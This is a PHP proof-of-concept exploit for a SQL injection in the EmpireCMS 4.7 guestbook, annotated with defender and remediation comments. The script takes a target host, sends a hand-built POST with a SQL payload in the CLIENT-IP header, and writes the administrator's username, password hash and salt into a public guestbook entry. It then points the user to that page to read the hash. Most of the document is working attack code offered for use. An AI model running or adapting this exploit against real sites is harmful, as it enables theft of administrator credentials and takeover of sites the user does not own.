Empire CMS 47 SQL Injection

<?php
/*
 * Proof-of-concept listing for a SQL injection in the EmpireCMS 4.7 guestbook
 * (e/enews/index.php, enews=AddGbook). The injection point is the CLIENT-IP
 * request header: the script places a raw SQL fragment ($cmd below) in that
 * header, which presumably the application copies into the guestbook INSERT
 * as the visitor's IP without escaping or parameterisation (inferred from the
 * payload shape; the server-side code is not on this page).
 *
 * Defender notes:
 *  - Any "client IP" taken from a request header (CLIENT-IP, X-Forwarded-For
 *    and similar) is attacker-controlled input and must be escaped or bound
 *    as a query parameter, never interpolated into SQL.
 *  - Detection signal: guestbook rows or web/WAF logs where the CLIENT-IP
 *    header contains quotes, parentheses, "select", or comment markers
 *    ("/*", "--"), or where a guestbook entry contains text resembling a
 *    username/password hash pair.
 *  - Remediation is a parameterised INSERT (and, ideally, taking the client
 *    address from the socket rather than from a header).
 */
print_r("
+------------------------------------------------------------------+
Application Info:
Name: EmpireCMS47
--------------------------------------------
Discoverd By: Securitylab.ir
Contacts: info@securitylab[dot]ir
Note: just work as php>=5&mysql>=4.1
--------------------------------------------
Vulnerability Info:
Sql Injection
Medium Risk
+------------------------------------------------------------------+
");
// CLI usage: argv[1] is the target host, argv[2] the path prefix of the install.
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path \n";
echo "host: target server \n";
echo "path: path to EmpireCMS47\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /\n";
die;
}
$host=$argv[1];
$path=$argv[2];
// Form body of an ordinary guestbook post; only enews=AddGbook and the
// presence of the fields matter to reach the vulnerable INSERT.
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
// The injected fragment. It terminates the current VALUES tuple and appends a
// second guestbook row whose content column is a subselect of
// username/password/rnd for userid=1 from phome_enewsuser; the trailing "/*"
// comments out the remainder of the original statement. The MySQL >= 4.1
// requirement in the banner is presumably the subquery support.
// NOTE(review): the literal spans two source lines, so the SQL contains a
// newline between "where" and "userid" — harmless to MySQL, but it means the
// header value is multi-line as sent.
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where 
userid=1),'',1,'1111',0,0,'')/*";
// Hand-built HTTP/1.1 POST. The Referer and Cookie mimic a visit to the
// guestbook page for board id 1; Content-Length is computed from $data.
$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
// The injection is delivered here, not in the form body.
$message .= "CLIENT-IP: $cmd\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($data)."\r\n";
$message .= "Cookie: ecmsgbookbid=1;\r\n";
// Connection: Close lets the read loop below terminate on EOF.
$message .= "Connection: Close\r\n";
$message .= "\r\n";
$message .=$data;
// Plain TCP to port 80; no timeout is given, so fsockopen uses the
// default_socket_timeout ini value.
$ock=fsockopen($host,80);
if (!$ock) {
echo 'No response from '.$host;
die;
}
echo "[+]connected to the site!\r\n";
echo "[+]sending data nowa|a|\r\n";
fputs($ock,$message);
// NOTE(review): the "@" here suppresses warnings on a plain assignment, which
// cannot emit any; it is a no-op left over from the original author.
@$resp ='';
// Read the raw response until the server closes the connection.
while ($ock && !feof($ock))
$resp .= fread($ock, 1024);
echo $resp;
echo "[+]done!\r\n";
// The extracted row is expected to be visible as a guestbook entry on the
// public page, which is why the hash shows up in the guestbook rather than in
// this response.
echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash"
?>